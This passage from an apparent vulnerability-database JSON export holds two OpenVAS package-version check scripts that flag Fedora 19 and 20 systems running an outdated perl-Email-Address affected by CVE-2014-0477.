FEDORA-2014-7613\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868219\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:40 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-0477\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for perl-Email-Address FEDORA-2014-7613\");\n script_tag(name: \"insight\", value: \"This class implements a regex-based RFC 2822 parser that locates email\naddresses in strings and returns a list of Email::Address objects found.\nAlternatively you may construct objects manually. The goal of this software\nis to be correct, and very very fast.\n\");\n script_tag(name: \"affected\", value: \"perl-Email-Address on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"FEDORA\", value: \"2014-7613\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138688.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of perl-Email-Address\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Email-Address\", rpm:\"perl-Email-Address~1.905~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:54", "references": ["2014-7610", "https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138680.html"], "pluginID": "1361412562310868209", "description": "Check for the Version of perl-Email-Address", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-10-01T00:00:00", "title": "Fedora Update for perl-Email-Address FEDORA-2014-7610", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0477"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310868209", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868209", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Email-Address FEDORA-2014-7610\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868209\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:31 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-0477\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for perl-Email-Address FEDORA-2014-7610\");\n script_tag(name: \"insight\", value: \"This class implements a regex-based RFC 2822 parser that locates email\naddresses in strings and returns a list of Email::Address objects found.\nAlternatively you may construct objects manually. The goal of this software\nis to be correct, and very very fast.\n\");\n script_tag(name: \"affected\", value: \"perl-Email-Address on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"FEDORA\", value: \"2014-7610\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138680.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of perl-Email-Address\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Email-Address\", rpm:\"perl-Email-Address~1.905~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}
